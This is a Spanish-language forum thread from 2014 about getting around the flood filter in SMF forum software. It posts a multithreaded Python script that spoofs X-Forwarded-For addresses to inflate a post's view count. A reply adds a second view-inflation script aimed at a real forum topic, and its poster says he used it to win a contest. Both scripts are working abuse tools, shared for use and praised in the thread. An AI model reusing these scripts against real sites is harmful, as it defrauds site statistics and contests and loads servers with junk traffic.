SMF Incorrect Flood Filter Headers

hielasangre · Agosto 21, 2014, 10:49:25 PM

Código: python


#!/usr/bin/python
# RemoteExecution 
#Autor: Daniel Godoy A.K.A hielasangre

import sys, threading, time, urllib2,re
print "Ingrese URL: "
url = raw_input()
a = b = c = d = 1
count = 0
class SMFPwner(threading.Thread):
  def __init__(self, num):
      threading.Thread.__init__(self)
      self.num = num      
  def run(self):
    while 1:
        global a,b,c,d,count, url
        data = ""
        while 1:
            while 1:
                if d!=250:
                    d+=1
                else:
                    if c!= 250:
                        c+=2
                        d=0
                    else:
                        if b!=250:
                            c=0
                            d=0
                            b+=1
                        else:
                            a+=1
                            b=0
                            c=0
                            d=0
                head = str(a)+'.'+str(b)+'.'+str(c)+'.'+str(d)
                headers = { 'X-Forwarded-For' : head }
                req = urllib2.Request(url, data, headers)
                f = urllib2.urlopen(req)
                count += 1
                print "[ Visitando => " + url + " Por " + str(count) +" vez ]" 
for i in range(3):   	
	ta = SMFPwner(i)
	ta.start()

Si bien no es una vulnerabilidad comprometedora, nos permite promocionar entre los primeros puestos (estadísticas) a nuestros posts, de manera arbitraria... Lo cual al menos, resulta divertido.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

ANTRAX · Agosto 21, 2014, 10:56:42 PM

Muy bueno hielasangre!!
Te hago una pregunta, esto genera sobrecarga en el servidor?

Abrazo!

hielasangre · Agosto 21, 2014, 11:17:49 PM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy bueno hielasangre!!
Te hago una pregunta, esto genera sobrecarga en el servidor?

Abrazo!

Todo depende de como este configurado, pero si porque son múltiples conexiones! Igual, si tenes un cloudflare en el medio lo mitiga automáticamente

chivo · Agosto 21, 2014, 11:39:37 PM

Gracias puedo usar el codigo para hacer una aplicacion claro coloco tu credito. Y te paso por MP el source final.

hielasangre · Agosto 21, 2014, 11:42:30 PM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si bien no es una vulnerabilidad comprometedora, nos permite promocionar entre los primeros puestos (estadísticas) a nuestros posts, de manera arbitraria... Lo cual al menos, resulta divertido.

No lo tomo como insulto, pero ahí lo respondí. Yo mismo se que es inútil, es verdad quizás el post debería ser borrado.. A lo mejor perdí mi tiempo no lo se, pero a lo mejor a otro le guste... En fin es cuestión de gustos! Lo use para un PoC

Como dije, todo va en cada uno.. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Gracias puedo usar el codigo para hacer una aplicacion claro coloco tu credito. Y te paso por MP el source final.

Dale que va, no interesan los creditos! Lo que interesa es que te sea útil!

$francisco · Agosto 22, 2014, 08:05:10 PM

Creo que cualquier código es de agradecer, una cosa que no entendí, ¿que es la cabecera X-Forwarded-For?

hielasangre · Agosto 22, 2014, 08:26:23 PM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Creo que cualquier código es de agradecer, una cosa que no entendí, ¿que es la cabecera X-Forwarded-For?

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

elrodrix · Agosto 23, 2014, 09:02:00 AM

Grande dani. Gracias por compartir. Y como decia un gran amigo mio, "a la gilada ni cabida, yo la miro desde arriba".

Snifer · Agosto 23, 2014, 09:15:52 AM

Ya lo probe :3 xD jajajaj interesante el script mil maneras de trollear

PD: Lo piratee para mi blog!

Regards,
Snifer

Once · Agosto 23, 2014, 01:46:04 PM

Genial brother, esto lo usé hace algún tiempo para ganar un concurso en otro foro. Aunque no es necesario complicarse con el X-Forwarded-For, este es el code que usé (lo probé acá en Underc0de y aún funciona) por si le sirve a alguien más para algo.

Código: python


import time
import urllib2


class Pvisits(object):
    def __init__(self, url, nvisitas, delay=0):
        headers = {
            "Referer": url,
            "User-Agent": "Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00",
        }
    
        for x in xrange(nvisitas):
            time.sleep(delay)
            request = urllib2.Request(url, headers=headers)
            obj_web = urllib2.urlopen(request)
            codigo = obj_web.code
            if codigo == 200:
                print obj_web.geturl(), codigo, nvisitas - x
            elif codigo >= 400:
                print "Ocurrio un error:", codigo
                return


Pvisits("http://underc0de.org/foro/index.php?topic=22799.0", 20, 0)

Saludos!

hielasangre · Agosto 23, 2014, 02:33:47 PM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Genial brother, esto lo usé hace algún tiempo para ganar un concurso en otro foro. Aunque no es necesario complicarse con el X-Forwarded-For, este es el code que usé (lo probé acá en Underc0de y aún funciona) por si le sirve a alguien más para algo.

Código: python


import time
import urllib2


class Pvisits(object):
    def __init__(self, url, nvisitas, delay=0):
        headers = {
            "Referer": url,
            "User-Agent": "Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00",
        }
    
        for x in xrange(nvisitas):
            time.sleep(delay)
            request = urllib2.Request(url, headers=headers)
            obj_web = urllib2.urlopen(request)
            codigo = obj_web.code
            if codigo == 200:
                print obj_web.geturl(), codigo, nvisitas - x
            elif codigo >= 400:
                print "Ocurrio un error:", codigo
                return


Pvisits("http://underc0de.org/foro/index.php?topic=22799.0", 20, 0)

Saludos!

OPAAAAA

Muy bueno! Hay que estudiar mas SMF me parece entonces

blackdrake · Agosto 23, 2014, 08:53:21 PM

Muy buen aporte, como dice hielasangre, me parece que vamos a tener que estudiar mas smf jajaja

SMF Incorrect Flood Filter Headers

hielasangre

Agosto 21, 2014, 10:49:25 PM Ultima modificación: Agosto 21, 2014, 11:00:21 PM por Expermicid

ANTRAX

Agosto 21, 2014, 10:56:42 PM #1

hielasangre

Agosto 21, 2014, 11:17:49 PM #2 Ultima modificación: Agosto 21, 2014, 11:38:07 PM por hielasangre

chivo

Agosto 21, 2014, 11:39:37 PM #3

hielasangre

Agosto 21, 2014, 11:42:30 PM #4

$francisco

Agosto 22, 2014, 08:05:10 PM #5

hielasangre

Agosto 22, 2014, 08:26:23 PM #6

elrodrix

Agosto 23, 2014, 09:02:00 AM #7

Snifer

Agosto 23, 2014, 09:15:52 AM #8

Once

Agosto 23, 2014, 01:46:04 PM #9

hielasangre

Agosto 23, 2014, 02:33:47 PM #10

blackdrake

Agosto 23, 2014, 08:53:21 PM #11